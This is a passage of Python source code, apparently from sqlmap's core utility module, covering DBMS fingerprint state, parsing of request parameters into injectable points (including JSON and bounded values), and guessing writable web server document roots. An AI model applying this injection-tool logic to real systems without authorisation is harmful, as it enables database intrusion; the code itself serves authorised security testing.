aliasToDbmsEnum(dbms)\n\n        return kb.dbms\n\n    @staticmethod\n    def setVersion(version):\n        if isinstance(version, six.string_types):\n            kb.dbmsVersion = [version]\n\n        return kb.dbmsVersion\n\n    @staticmethod\n    def setVersionList(versionsList):\n        if isinstance(versionsList, list):\n            kb.dbmsVersion = versionsList\n        elif isinstance(versionsList, six.string_types):\n            Backend.setVersion(versionsList)\n        else:\n            logger.error(\"invalid format of versionsList\")\n\n    @staticmethod\n    def forceDbms(dbms, sticky=False):\n        if not kb.stickyDBMS:\n            kb.forcedDbms = aliasToDbmsEnum(dbms)\n            kb.stickyDBMS = sticky\n\n    @staticmethod\n    def flushForcedDbms(force=False):\n        if not kb.stickyDBMS or force:\n            kb.forcedDbms = None\n            kb.stickyDBMS = False\n\n    @staticmethod\n    def setOs(os):\n        if os is None:\n            return None\n\n        # Little precaution, in theory this condition should always be false\n        elif kb.os is not None and isinstance(os, six.string_types) and kb.os.lower() != os.lower():\n            msg = \"sqlmap previously fingerprinted back-end DBMS \"\n            msg += \"operating system %s. However now it has \" % kb.os\n            msg += \"been fingerprinted to be %s. \" % os\n            msg += \"Please, specify which OS is \"\n            msg += \"correct [%s (default)/%s] \" % (kb.os, os)\n\n            while True:\n                choice = readInput(msg, default=kb.os)\n\n                if choice == kb.os:\n                    break\n                elif choice == os:\n                    kb.os = choice.capitalize()\n                    break\n                else:\n                    warnMsg = \"invalid value\"\n                    logger.warning(warnMsg)\n\n        elif kb.os is None and isinstance(os, six.string_types):\n            kb.os = os.capitalize()\n\n        return kb.os\n\n    @staticmethod\n    def setOsVersion(version):\n        if version is None:\n            return None\n\n        elif kb.osVersion is None and isinstance(version, six.string_types):\n            kb.osVersion = version\n\n    @staticmethod\n    def setOsServicePack(sp):\n        if sp is None:\n            return None\n\n        elif kb.osSP is None and isinstance(sp, int):\n            kb.osSP = sp\n\n    @staticmethod\n    def setArch():\n        msg = \"what is the back-end database management system architecture?\"\n        msg += \"\\n[1] 32-bit (default)\"\n        msg += \"\\n[2] 64-bit\"\n\n        while True:\n            choice = readInput(msg, default='1')\n\n            if hasattr(choice, \"isdigit\") and choice.isdigit() and int(choice) in (1, 2):\n                kb.arch = 32 if int(choice) == 1 else 64\n                break\n            else:\n                warnMsg = \"invalid value. Valid values are 1 and 2\"\n                logger.warning(warnMsg)\n\n        return kb.arch\n\n    # Get methods\n    @staticmethod\n    def getForcedDbms():\n        return aliasToDbmsEnum(conf.get(\"forceDbms\")) or aliasToDbmsEnum(kb.get(\"forcedDbms\"))\n\n    @staticmethod\n    def getDbms():\n        return aliasToDbmsEnum(kb.get(\"dbms\"))\n\n    @staticmethod\n    def getErrorParsedDBMSes():\n        \"\"\"\n        Returns array with parsed DBMS names till now\n\n        This functions is called to:\n\n        1. Ask user whether or not skip specific DBMS tests in detection phase,\n           lib/controller/checks.py - detection phase.\n        2. Sort the fingerprint of the DBMS, lib/controller/handler.py -\n           fingerprint phase.\n        \"\"\"\n\n        return kb.htmlFp if kb.get(\"heuristicTest\") == HEURISTIC_TEST.POSITIVE else []\n\n    @staticmethod\n    def getIdentifiedDbms():\n        \"\"\"\n        This functions is called to:\n\n        1. Sort the tests, getSortedInjectionTests() - detection phase.\n        2. Etc.\n        \"\"\"\n\n        dbms = None\n\n        if not kb:\n            pass\n        elif not kb.get(\"testMode\") and conf.get(\"dbmsHandler\") and getattr(conf.dbmsHandler, \"_dbms\", None):\n            dbms = conf.dbmsHandler._dbms\n        elif Backend.getForcedDbms() is not None:\n            dbms = Backend.getForcedDbms()\n        elif Backend.getDbms() is not None:\n            dbms = Backend.getDbms()\n        elif kb.get(\"injection\") and kb.injection.dbms:\n            dbms = unArrayizeValue(kb.injection.dbms)\n        elif Backend.getErrorParsedDBMSes():\n            dbms = unArrayizeValue(Backend.getErrorParsedDBMSes())\n        elif conf.get(\"dbms\"):\n            dbms = conf.get(\"dbms\")\n\n        return aliasToDbmsEnum(dbms)\n\n    @staticmethod\n    def getVersion():\n        versions = filterNone(flattenValue(kb.dbmsVersion)) if not isinstance(kb.dbmsVersion, six.string_types) else [kb.dbmsVersion]\n        if not isNoneValue(versions):\n            return versions[0]\n        else:\n            return None\n\n    @staticmethod\n    def getVersionList():\n        versions = filterNone(flattenValue(kb.dbmsVersion)) if not isinstance(kb.dbmsVersion, six.string_types) else [kb.dbmsVersion]\n        if not isNoneValue(versions):\n            return versions\n        else:\n            return None\n\n    @staticmethod\n    def getOs():\n        return kb.os\n\n    @staticmethod\n    def getOsVersion():\n        return kb.osVersion\n\n    @staticmethod\n    def getOsServicePack():\n        return kb.osSP\n\n    @staticmethod\n    def getArch():\n        if kb.arch is None:\n            Backend.setArch()\n        return kb.arch\n\n    # Comparison methods\n    @staticmethod\n    def isDbms(dbms):\n        if not kb.get(\"testMode\") and all((Backend.getDbms(), Backend.getIdentifiedDbms())) and Backend.getDbms() != Backend.getIdentifiedDbms():\n            singleTimeWarnMessage(\"identified ('%s') and fingerprinted ('%s') DBMSes differ. If you experience problems in enumeration phase please rerun with '--flush-session'\" % (Backend.getIdentifiedDbms(), Backend.getDbms()))\n        return Backend.getIdentifiedDbms() == aliasToDbmsEnum(dbms)\n\n    @staticmethod\n    def isFork(fork):\n        return hashDBRetrieve(HASHDB_KEYS.DBMS_FORK) == fork\n\n    @staticmethod\n    def isDbmsWithin(aliases):\n        return Backend.getDbms() is not None and Backend.getDbms().lower() in aliases\n\n    @staticmethod\n    def isVersion(version):\n        return Backend.getVersion() is not None and Backend.getVersion() == version\n\n    @staticmethod\n    def isVersionWithin(versionList):\n        if Backend.getVersionList() is None:\n            return False\n\n        for _ in Backend.getVersionList():\n            if _ != UNKNOWN_DBMS_VERSION and _ in versionList:\n                return True\n\n        return False\n\n    @staticmethod\n    def isVersionGreaterOrEqualThan(version):\n        retVal = False\n\n        if all(_ not in (None, UNKNOWN_DBMS_VERSION) for _ in (Backend.getVersion(), version)):\n            _version = unArrayizeValue(Backend.getVersion())\n            _version = re.sub(r\"[<>= ]\", \"\", _version)\n\n            try:\n                retVal = LooseVersion(_version) >= LooseVersion(version)\n            except:\n                retVal = str(_version) >= str(version)\n\n        return retVal\n\n    @staticmethod\n    def isOs(os):\n        return Backend.getOs() is not None and Backend.getOs().lower() == os.lower()\n\ndef paramToDict(place, parameters=None):\n    \"\"\"\n    Split the parameters into names and values, check if these parameters\n    are within the testable parameters and return in a dictionary.\n    \"\"\"\n\n    testableParameters = OrderedDict()\n\n    if place in conf.parameters and not parameters:\n        parameters = conf.parameters[place]\n\n    parameters = re.sub(r\"&(\\w{1,4});\", r\"%s\\g<1>%s\" % (PARAMETER_AMP_MARKER, PARAMETER_SEMICOLON_MARKER), parameters)\n    if place == PLACE.COOKIE:\n        splitParams = parameters.split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER)\n    else:\n        splitParams = parameters.split(conf.paramDel or DEFAULT_GET_POST_DELIMITER)\n\n    for element in splitParams:\n        element = re.sub(r\"%s(.+?)%s\" % (PARAMETER_AMP_MARKER, PARAMETER_SEMICOLON_MARKER), r\"&\\g<1>;\", element)\n        parts = element.split(\"=\")\n\n        if len(parts) >= 2:\n            parameter = urldecode(parts[0].replace(\" \", \"\"))\n\n            if not parameter:\n                continue\n\n            if conf.paramDel and conf.paramDel == '\\n':\n                parts[-1] = parts[-1].rstrip()\n\n            condition = not conf.testParameter\n            condition |= conf.testParameter is not None and parameter in conf.testParameter\n            condition |= place == PLACE.COOKIE and len(intersect((PLACE.COOKIE,), conf.testParameter, True)) > 0\n\n            if condition:\n                value = \"=\".join(parts[1:])\n\n                if parameter in (conf.base64Parameter or []):\n                    try:\n                        kb.base64Originals[parameter] = oldValue = value\n                        value = urldecode(value, convall=True)\n                        value = decodeBase64(value, binary=False, encoding=conf.encoding or UNICODE_ENCODING)\n                        parameters = re.sub(r\"\\b%s(\\b|\\Z)\" % re.escape(oldValue), value, parameters)\n                    except:\n                        errMsg = \"parameter '%s' does not contain \" % parameter\n                        errMsg += \"valid Base64 encoded value ('%s')\" % value\n                        raise SqlmapValueException(errMsg)\n\n                testableParameters[parameter] = value\n\n                if not conf.multipleTargets and not (conf.csrfToken and re.search(conf.csrfToken, parameter, re.I)):\n                    _ = urldecode(testableParameters[parameter], convall=True)\n                    if (_.endswith(\"'\") and _.count(\"'\") == 1 or re.search(r'\\A9{3,}', _) or re.search(r'\\A-\\d+\\Z', _) or re.search(DUMMY_USER_INJECTION, _)) and not parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX):\n                        warnMsg = \"it appears that you have provided tainted parameter values \"\n                        warnMsg += \"('%s') with most likely leftover \" % element\n                        warnMsg += \"chars/statements from manual SQL injection test(s). \"\n                        warnMsg += \"Please, always use only valid parameter values \"\n                        warnMsg += \"so sqlmap could be able to run properly\"\n                        logger.warning(warnMsg)\n\n                        message = \"are you really sure that you want to continue (sqlmap could have problems)? [y/N] \"\n\n                        if not readInput(message, default='N', boolean=True):\n                            raise SqlmapSilentQuitException\n                    elif not _:\n                        warnMsg = \"provided value for parameter '%s' is empty. \" % parameter\n                        warnMsg += \"Please, always use only valid parameter values \"\n                        warnMsg += \"so sqlmap could be able to run properly\"\n                        logger.warning(warnMsg)\n\n                if place in (PLACE.POST, PLACE.GET):\n                    for regex in (r\"\\A((?:<[^>]+>)+\\w+)((?:<[^>]+>)+)\\Z\", r\"\\A([^\\w]+.*\\w+)([^\\w]+)\\Z\"):\n                        match = re.search(regex, testableParameters[parameter])\n                        if match:\n                            try:\n                                candidates = OrderedDict()\n\n                                def walk(head, current=None):\n                                    if current is None:\n                                        current = head\n                                    if isListLike(current):\n                                        for _ in current:\n                                            walk(head, _)\n                                    elif isinstance(current, dict):\n                                        for key in current.keys():\n                                            value = current[key]\n                                            if isinstance(value, (bool, int, float, six.string_types)) or value in (None, []):\n                                                original = current[key]\n                                                if isinstance(value, bool):\n                                                    current[key] = \"%s%s\" % (getUnicode(value).lower(), BOUNDED_INJECTION_MARKER)\n                                                elif value is None:\n                                                    current[key] = \"%s%s\" % (randomInt(), BOUNDED_INJECTION_MARKER)\n                                                elif value == []:\n                                                    current[key] = [\"%s%s\" % (randomInt(), BOUNDED_INJECTION_MARKER)]\n                                                else:\n                                                    current[key] = \"%s%s\" % (value, BOUNDED_INJECTION_MARKER)\n                                                candidates[\"%s (%s)\" % (parameter, key)] = re.sub(r\"\\b(%s\\s*=\\s*)%s\" % (re.escape(parameter), re.escape(testableParameters[parameter])), r\"\\g<1>%s\" % json.dumps(deserialized, separators=(',', ':') if \", \" not in testableParameters[parameter] else None), parameters)\n                                                current[key] = original\n                                            elif isinstance(value, (list, tuple, set, dict)):\n                                                if value:\n                                                    walk(head, value)\n\n                                deserialized = json.loads(testableParameters[parameter])\n                                walk(deserialized)\n\n                                if candidates:\n                                    message = \"it appears that provided value for %sparameter '%s' \" % (\"%s \" % place if place != parameter else \"\", parameter)\n                                    message += \"is JSON deserializable. Do you want to inject inside? [y/N] \"\n\n                                    if readInput(message, default='N', boolean=True):\n                                        del testableParameters[parameter]\n                                        testableParameters.update(candidates)\n                                    break\n                            except (KeyboardInterrupt, SqlmapUserQuitException):\n                                raise\n                            except Exception:\n                                pass\n\n                            _ = re.sub(regex, r\"\\g<1>%s\\g<%d>\" % (kb.customInjectionMark, len(match.groups())), testableParameters[parameter])\n                            message = \"it appears that provided value for %sparameter '%s' \" % (\"%s \" % place if place != parameter else \"\", parameter)\n                            message += \"has boundaries. Do you want to inject inside? ('%s') [y/N] \" % getUnicode(_)\n\n                            if readInput(message, default='N', boolean=True):\n                                testableParameters[parameter] = re.sub(r\"\\b(%s\\s*=\\s*)%s\" % (re.escape(parameter), re.escape(testableParameters[parameter])), (r\"\\g<1>%s\" % re.sub(regex, r\"\\g<1>%s\\g<2>\" % BOUNDED_INJECTION_MARKER, testableParameters[parameter].replace(\"\\\\\", r\"\\\\\"))), parameters)\n                            break\n\n    if conf.testParameter:\n        if not testableParameters:\n            paramStr = \", \".join(test for test in conf.testParameter)\n\n            if len(conf.testParameter) > 1:\n                warnMsg = \"provided parameters '%s' \" % paramStr\n                warnMsg += \"are not inside the %s\" % place\n                logger.warning(warnMsg)\n            else:\n                parameter = conf.testParameter[0]\n\n                if not intersect(USER_AGENT_ALIASES + REFERER_ALIASES + HOST_ALIASES, parameter, True):\n                    debugMsg = \"provided parameter '%s' \" % paramStr\n                    debugMsg += \"is not inside the %s\" % place\n                    logger.debug(debugMsg)\n\n        elif len(conf.testParameter) != len(testableParameters):\n            for parameter in conf.testParameter:\n                if parameter not in testableParameters:\n                    debugMsg = \"provided parameter '%s' \" % parameter\n                    debugMsg += \"is not inside the %s\" % place\n                    logger.debug(debugMsg)\n\n    if testableParameters:\n        for parameter, value in testableParameters.items():\n            if value and not value.isdigit():\n                for encoding in (\"hex\", \"base64\"):\n                    try:\n                        decoded = codecs.decode(value, encoding)\n                        if len(decoded) > MIN_ENCODED_LEN_CHECK and all(_ in getBytes(string.printable) for _ in decoded):\n                            warnMsg = \"provided parameter '%s' \" % parameter\n                            warnMsg += \"appears to be '%s' encoded\" % encoding\n                            logger.warning(warnMsg)\n                            break\n                    except:\n                        pass\n\n    return testableParameters\n\ndef getManualDirectories():\n    directories = None\n    defaultDocRoot = DEFAULT_DOC_ROOTS.get(Backend.getOs(), DEFAULT_DOC_ROOTS[OS.LINUX])\n\n    if kb.absFilePaths:\n        for absFilePath in kb.absFilePaths:\n            if directories:\n                break\n\n            if directoryPath(absFilePath) == '/':\n                continue\n\n            absFilePath = normalizePath(absFilePath)\n            windowsDriveLetter = None\n\n            if isWindowsDriveLetterPath(absFilePath):\n                windowsDriveLetter, absFilePath = absFilePath[:2], absFilePath[2:]\n                absFilePath = ntToPosixSlashes(posixToNtSlashes(absFilePath))\n\n            for _ in list(GENERIC_DOC_ROOT_DIRECTORY_NAMES) + [conf.hostname]:\n                _ = \"/%s/\" % _\n\n                if _ in absFilePath:\n                    directories = \"%s%s\" % (absFilePath.split(_)[0], _)\n                    break\n\n            if not directories and conf.path.strip('/') and conf.path in absFilePath:\n                directories = absFilePath.split(conf.path)[0]\n\n            if directories and windowsDriveLetter:\n                directories = \"%s/%s\" % (windowsDriveLetter, ntToPosixSlashes(directories))\n\n    directories = normalizePath(directories)\n\n    if conf.webRoot:\n        directories = [conf.webRoot]\n        infoMsg = \"using '%s' as web server document root\" % conf.webRoot\n        logger.info(infoMsg)\n    elif directories:\n        infoMsg = \"retrieved the web server document root: '%s'\" % directories\n        logger.info(infoMsg)\n    else:\n        warnMsg = \"unable to automatically retrieve the web server \"\n        warnMsg += \"document root\"\n        logger.warning(warnMsg)\n\n        directories = []\n\n        message = \"what do you want to use for writable directory?\\n\"\n        message += \"[1] common location(s) ('%s') (default)\\n\" % \", \".join(root for root in defaultDocRoot)\n        message += \"[2] custom location(s)\\n\"\n        message += \"[3] custom directory list file\\n\"\n        message += \"[4] brute force search\"\n        choice = readInput(message, default='1')\n\n        if choice == '2':\n            message = \"please provide a comma separate list of absolute directory paths: \"\n            directories = readInput(message, default=\"\").split(',')\n        elif choice == '3':\n            message = \"what's the list file location?\\n\"\n            listPath = readInput(message, default=\"\")\n            checkFile(listPath)\n            directories = getFileItems(listPath)\n        elif choice == '4':\n            targets = set([conf.hostname])\n            _ = conf.hostname.split('.')\n\n            if _[0] == \"www\":\n                targets.add('.'.join(_[1:]))\n                targets.add('.'.join(_[1:-1]))\n            else:\n                targets.add('.'.join(_[:-1]))\n\n            targets = filterNone(targets)\n\n            for prefix in BRUTE_DOC_ROOT_PREFIXES.get(Backend.getOs(), DEFAULT_DOC_ROOTS[OS.LINUX]):\n                if BRUTE_DOC_ROOT_TARGET_MARK in prefix and re.match(IP_ADDRESS_REGEX, conf.hostname):\n                    continue\n\n                for suffix in BRUTE_DOC_ROOT_SUFFIXES:\n                    for target in targets:\n                        if not prefix.endswith(\"/%s\" % suffix):\n                            item = \"%s/%s\" % (prefix, suffix)\n                        else:\n                            item = prefix\n\n                        item = item.replace(BRUTE_DOC_ROOT_TARGET_MARK, target).replace(\"//\", '/').rstrip('/')\n                        if item not in directories:\n                            directories.append(item)\n\n                        if BRUTE_DOC_ROOT_TARGET_MARK not in prefix:\n                            break\n\n            infoMsg = \"using generated directory list: %s\" % ','.join(directories)\n            logger.info(infoMsg)\n\n            msg = \"use any additional custom directories [Enter for None]: \"\n            answer = readInput(msg)\n\n            if answer:\n                directories.extend(answer.split(','))\n\n        else:\n            directories = defaultDocRoot\n\n    return directories\n\ndef getAutoDirectories():\n    \"\"\"\n    >>> pushValue(kb.absFilePaths)\n    >>> kb.absFilePaths = [\"C:\\\\inetpub\\\\wwwroot\\\\index.asp\", \"/var/www/html\"]\n    >>> getAutoDirectories()\n    ['C:/inetpub/wwwroot', '/var/www/html']\n    >>> kb.absFilePaths = popValue()\n    \"\"\"\n\n    retVal = OrderedSet()\n\n    if kb.absFilePaths:\n        infoMsg = \"retrieved web server absolute paths: \"\n        infoMsg += \"'%s'\" % \", \".join(ntToPosixSlashes(path) for path in kb.absFilePaths)\n        logger.info(infoMsg)\n\n        for absFilePath in kb.absFilePaths:\n            if absFilePath:\n                directory = directoryPath(absFilePath)\n                directory = ntToPosixSlashes(directory)\n                retVal.add(directory)\n    else:\n        warnMsg = \"unable to automatically parse any web server path\"\n        logger.warning(warnMsg)\n\n    return list(retVal)\n\ndef filePathToSafeString(filePath):\n    \"\"\"\n    Returns string representation of a given filepath safe for a single filename usage\n\n    >>> filePathToSafeString('C:/Windows/system32')\n    'C__Windows_system32'\n    \"\"\"\n\n    retVal = filePath.replace(\"/\", \"_\").replace(\"\\\\\", \"_\")\n    retVal = retVal.replace(\" \", \"_\").replace(\":\", \"_\")\n\n    return retVal\n\ndef singleTimeDebugMessage(message):\n    singleTimeLogMessage(message, logging.DEBUG)\n\ndef singleTimeWarnMessage(message):\n    singleTimeLogMessage(message, logging.WARN)\n\ndef singleTimeLogMessage(message, level=logging.INFO, flag=None):\n    if flag is None:\n        flag = hash(message)\n\n    if not conf.smokeTest and flag not in kb.singleLogFlags:\n        kb.singleLogFlags.add(flag)\n        logger.log(level, message)\n\ndef boldifyMessage(message, istty=None):\n    \"\"\"\n    Sets ANSI bold marking on entire message if parts found in predefined BOLD_PATTERNS\n\n    >>> boldifyMessage(\"Hello World\", istty=True)\n    'Hello World'\n\n    >>> boldifyMessage(\"GET parameter id is not injectable\", istty=True)\n    '\\\\x1b[1mGET parameter id is not injectable\\\\x1b[0m'\n    \"\"\"\n\n    retVal = message\n\n    if any(_ in message for _ in BOLD_PATTERNS):\n        retVal = setColor(message, bold=True, istty=istty)\n\n    return retVal\n\ndef setColor(message, color=None, bold=False, level=None, istty=None):\n    \"\"\"\n    Sets ANSI color codes\n\n    >>> setColor(\"Hello World\", color=\"red\", istty=True)\n    '\\\\x1b[31mHello World\\\\x1b[0m'\n    >>> setColor(\"[INFO] Hello World\", istty=True)\n    '[\\\\x1b[32mINFO\\\\x1b[0m] Hello World'\n    >>> setColor(\"[INFO] Hello [CRITICAL] World\", istty=True)\n    '[INFO] Hello [CRITICAL] World'\n    \"\"\"\n\n    retVal = message\n\n    if message:\n        if (IS_TTY or istty) and not conf.get(\"disableColoring\"):  # colorizing handler\n            if level is None:\n                levels = re.findall(r\"\\[(?P<result>%s)\\]\" % '|'.join(_[0] for _ in getPublicTypeMembers(LOGGING_LEVELS)), message)\n\n                if len(levels) == 1:\n                    level = levels[0]\n\n            if bold or color:\n                retVal = colored(message, color=color, on_color=None, attrs=(\"bold\",) if bold else None)\n            elif level:\n                try:\n                    level = getattr(logging, level, None)\n                except:\n                    level = None\n                retVal = LOGGER_HANDLER.colorize(message, level, True)\n            else:\n                match = re.search(r\"\\(([^)]*)\\s*fork\\)\", message)\n                if match:\n                    retVal = retVal.replace(match.group(1), colored(match.group(1), color=\"lightgrey\"))\n\n                if not any(_ in message for _ in (\"Payload: \",)):\n                    for match in re.finditer(r\"([^\\w])'([^\\n']+)'\", message):  # single-quoted (Note: watch-out for the banner)\n                        retVal = retVal.replace(match.group(0), \"%s'%s'\" % (match.group(1), colored(match.group(2), color=\"lightgrey\")))\n\n        message = message.strip()\n\n    return retVal\n\ndef clearColors(message):\n    \"\"\"\n    Clears ANSI color codes\n\n    >>> clearColors(\"\\x1b[38;5;82mHello \\x1b[38;5;198mWorld\")\n    'Hello World'\n    \"\"\"\n\n    retVal = message\n\n    if isinstance(message, str):\n        retVal = re.sub(r\"\\x1b\\[[\\d;]+m\", \"\", message)\n\n    return retVal\n\ndef dataToStdout(data, forceOutput=False, bold=False, contentType=None, status=CONTENT_STATUS.IN_PROGRESS, coloring=True):\n    \"\"\"\n    Writes text to the stdout (console) stream\n    \"\"\"\n\n    if not IS_TTY and isinstance(data, six.string_types) and data.startswith(\"\\r\"):\n        if re.search(r\"\\(\\d+%\\)\", data):\n            data = \"\"\n        else:\n            data = \"\\n%s\" % data.strip(\"\\r\")\n\n    if not kb.get(\"threadException\"):\n        if forceOutput or not (getCurrentThreadData().disableStdOut or kb.get(\"wizardMode\")):\n            multiThreadMode = kb.get(\"multiThreadMode\")\n            if multiThreadMode:\n                logging._acquireLock()\n\n            try:\n                if conf.get(\"api\"):\n                    sys.stdout.write(stdoutEncode(clearColors(data)), status, contentType)\n                else:\n                    sys.stdout.write(stdoutEncode(setColor(data, bold=bold) if coloring else clearColors(data)))\n            except IOError:\n                pass\n            except UnicodeEncodeError:\n                sys.stdout.write(re.sub(r\"[^ -~]\", '?', clearColors(data)))\n            finally:\n                sys.stdout.flush()\n\n            if multiThreadMode:\n                logging._releaseLock()\n\n            kb.prependFlag = isinstance(data, six.string_types) and (len(data) == 1 and data not in ('\\n', '\\r') or len(data) > 2 and data[0] == '\\r' and data[-1] != '\\n')\n\ndef dataToTrafficFile(data):\n    if not conf.trafficFile:\n        return\n\n    try:\n        conf.trafficFP.write(data)\n        conf.trafficFP.flush()\n    except IOError as ex:\n        errMsg = \"something went wrong while trying \"\n        errMsg += \"to write to the traffic file '%s' ('%s')\" % (conf.trafficFile, getSafeExString(ex))\n        raise SqlmapSystemException(errMsg)\n\ndef dataToDumpFile(dumpFile, data):\n    try:\n        dumpFile.write(data)\n        dumpFile.flush()\n    except IOError as ex:\n        if \"No space left\" in getUnicode(ex):\n            errMsg = \"no space left on output device\"\n            logger.error(errMsg)\n        elif \"Permission denied\" in getUnicode(ex):\n            errMsg = \"permission denied when flushing dump data\"\n            logger.error(errMsg)\n        else:\n            errMsg = \"error occurred when writing dump data to file ('%s')\" % getUnicode(ex)\n            logger.error(errMsg)\n\ndef dataToOutFile(filename, data):\n    \"\"\"\n    Saves data to filename\n\n    >>> pushValue(conf.get(\"filePath\"))\n    >>> conf.filePath = tempfile.gettempdir()\n    >>> \"_etc_passwd\" in dataToOutFile(\"/etc/passwd\", b\":::*\")\n    True\n    >>> conf.filePath = popValue()\n    \"\"\"\n\n    retVal = None\n\n    if data:\n        while True:\n            retVal = os.path.join(conf.filePath, filePathToSafeString(filename))\n\n            try:\n                with open(retVal, \"w+b\") as f:  # has to stay as non-codecs because data is raw ASCII encoded data\n                    f.write(getBytes(data))\n            except UnicodeEncodeError as ex:\n                _ = normalizeUnicode(filename)\n                if filename != _:\n                    filename = _\n                else:\n                    errMsg = \"couldn't write to the \"\n                    errMsg += \"output file ('%s')\" % getSafeExString(ex)\n                    raise SqlmapGenericException(errMsg)\n            except IOError as ex:\n                errMsg = \"something went wrong while trying to write \"\n                errMsg += \"to the output file ('%s')\" % getSafeExString(ex)\n                raise SqlmapGenericException(errMsg)\n            else:\n                break\n\n    return retVal\n\ndef readInput(message, default=None, checkBatch=True, boolean=False):\n    \"\"\"\n    Reads input from terminal\n    \"\"\"\n\n    retVal = None\n\n    message = getUnicode(message)\n\n    if \"\\n\" in message:\n        message += \"%s> \" % (\"\\n\" if message.count(\"\\n\") > 1 else \"\")\n    elif message[-1] == ']':\n        message += \" \"\n\n    if kb.get(\"prependFlag\"):\n        message = \"\\n%s\" % message\n        kb.prependFlag = False\n\n    if conf.get(\"answers\"):\n        if not any(_ in conf.answers for _ in \",=\"):\n            return conf.answers\n\n        for item in conf.answers.split(','):\n            question = item.split('=')[0].strip()\n            answer = item.split('=')[1] if len(item.split('=')) > 1 else None\n            if answer and question.lower() in message.lower():\n                retVal = getUnicode(answer, UNICODE_ENCODING)\n            elif answer is None and retVal:\n                retVal = \"%s,%s\" % (retVal, getUnicode(item, UNICODE_ENCODING))\n\n    if message and IS_TTY:\n        message = \"\\r%s\" % message\n\n    if retVal:\n        dataToStdout(\"%s%s\\n\" % (message, retVal), forceOutput=not kb.wizardMode, bold=True)\n\n        debugMsg = \"used the given answer\"\n        logger.debug(debugMsg)\n\n    if retVal is None:\n        if checkBatch and conf.get(\"batch\") or any(conf.get(_) for _ in (\"api\", \"nonInteractive\")):\n            if isListLike(default):\n                options = ','.join(getUnicode(opt, UNICODE_ENCODING) for opt in default)\n            elif default:\n                options = getUnicode(default, UNICODE_ENCODING)\n            else:\n                options = six.text_type()\n\n            dataToStdout(\"%s%s\\n\" % (message, options), forceOutput=not kb.wizardMode, bold=True)\n\n            debugMsg = \"used the default behavior, running in batch mode\"\n            logger.debug(debugMsg)\n\n            retVal = default\n        else:\n            try:\n                logging._acquireLock()\n\n                if conf.get(\"beep\"):\n                    beep()\n\n                dataToStdout(\"%s\" % message, forceOutput=not kb.wizardMode, bold=True)\n                kb.prependFlag = False\n\n                retVal = _input()\n                if not retVal:  # Note: Python doesn't print newline on empty input\n                    dataToStdout(\"\\n\")\n                retVal = retVal.strip() or default\n                retVal = getUnicode(retVal, encoding=getattr(sys.stdin, \"encoding\", None)) if retVal else retVal\n            except:\n                try:\n                    time.sleep(0.05)  # Reference: http://www.gossamer-threads.com/lists/python/python/781893\n                except:\n                    pass\n                finally:\n                    kb.prependFlag = True\n                    raise SqlmapUserQuitException\n\n            finally:\n                logging._releaseLock()\n\n    if retVal and default and isinstance(default, six.string_types) and len(default) == 1:\n        retVal = retVal.strip()\n\n    if boolean:\n        retVal = retVal.strip().upper() == 'Y'\n    else:\n        retVal = retVal or \"\"\n\n    return retVal\n\ndef setTechnique(technique):\n    \"\"\"\n    Thread-safe setting of currently used technique (Note: dealing with cases of per-thread technique switching)\n    \"\"\"\n\n    getCurrentThreadData().technique = technique\n\ndef getTechnique():\n    \"\"\"\n    Thread-safe getting of currently used technique\n    \"\"\"\n\n    return getCurrentThreadData().technique or kb.get(\"technique\")\n\ndef randomRange(start=0, stop=1000, seed=None):\n    \"\"\"\n    Returns random integer value in given range\n\n    >>> random.seed(0)\n    >>> randomRange(1, 500)\n    152\n    \"\"\"\n\n    if seed is not None:\n        _ = getCurrentThreadData().random\n        _.seed(seed)\n        randint = _.randint\n    else:\n        randint = random.randint\n\n    return int(randint(start, stop))\n\ndef randomInt(length=4, seed=None):\n    \"\"\"\n    Returns random integer value with provided number of digits\n\n    >>> random.seed(0)\n    >>> randomInt(6)\n    963638\n    \"\"\"\n\n    if seed is not None:\n        _ = getCurrentThreadData().random\n        _.seed(seed)\n        choice = _.choice\n    else:\n        choice = random.choice\n\n    return int(\"\".join(choice(string.digits if _ != 0 else string.digits.replace('0', '')) for _ in xrange(0, length)))\n\ndef randomStr(length=4, lowercase=False, alphabet=None, seed=None):\n    \"\"\"\n    Returns random string value with provided number of characters\n\n    >>> random.seed(0)\n    >>> randomStr(6)\n    'FUPGpY'\n    \"\"\"\n\n    if seed is not None:\n        _random = getCurrentThreadData().random\n        _random.seed(seed)\n        choice = _random.choice\n    else:\n        choice = random.choice\n\n    if alphabet:\n        retVal = \"\".join(choice(alphabet) for _ in xrange(0, length))\n    elif lowercase:\n        retVal = \"\".join(choice(string.ascii_lowercase) for _ in xrange(0, length))\n    else:\n        retVal = \"\".join(choice(string.ascii_letters) for _ in xrange(0, length))\n\n    return retVal\n\ndef sanitizeStr(value):\n    \"\"\"\n    Sanitizes string value in respect to newline and line-feed characters\n\n    >>> sanitizeStr('foo\\\\n\\\\rbar') == 'foo bar'\n    True\n    >>> sanitizeStr(None) == 'None'\n    True\n    \"\"\"\n\n    return getUnicode(value).replace(\"\\n\", \" \").replace(\"\\r\", \"\")\n\ndef getHeader(headers, key):\n    \"\"\"\n    Returns header value ignoring the letter case\n\n    >>> getHeader({\"Foo\": \"bar\"}, \"foo\")\n    'bar'\n    \"\"\"\n\n    retVal = None\n\n    for header in (headers or {}):\n        if header.upper() == key.upper():\n            retVal = headers[header]\n            break\n\n    return retVal\n\ndef checkPipedInput():\n    \"\"\"\n    Checks whether input to program has been provided via standard input (e.g. cat /tmp/req.txt | python sqlmap.py -r -)\n    # Reference: https://stackoverflow.com/a/33873570\n    \"\"\"\n\n    return hasattr(sys.stdin, \"fileno\") and not os.isatty(sys.stdin.fileno())\n\ndef isZipFile(filename):\n    \"\"\"\n    Checks if file contains zip compressed content\n\n    >>> isZipFile(paths.WORDLIST)\n    True\n    \"\"\"\n\n    checkFile(filename)\n\n    return openFile(filename, \"rb\", encoding=None).read(len(ZIP_HEADER)) == ZIP_HEADER\n\ndef isDigit(value):\n    \"\"\"\n    Checks if provided (string) value consists of digits (Note: Python's isdigit() is problematic)\n\n    >>> u'\\xb2'.isdigit()\n    True\n    >>> isDigit(u'\\xb2')\n    False\n    >>> isDigit('123456')\n    True\n    >>> isDigit('3b3')\n    False\n    \"\"\"\n\n    return re.search(r\"\\A[0-9]+\\Z\", value or \"\") is not None\n\ndef checkFile(filename, raiseOnError=True):\n    \"\"\"\n    Checks for file existence and readability\n\n    >>> checkFile(__file__)\n    True\n    \"\"\"\n\n    valid = True\n\n    if filename:\n        filename = filename.strip('\"\\'')\n\n    if filename == STDIN_PIPE_DASH:\n        return 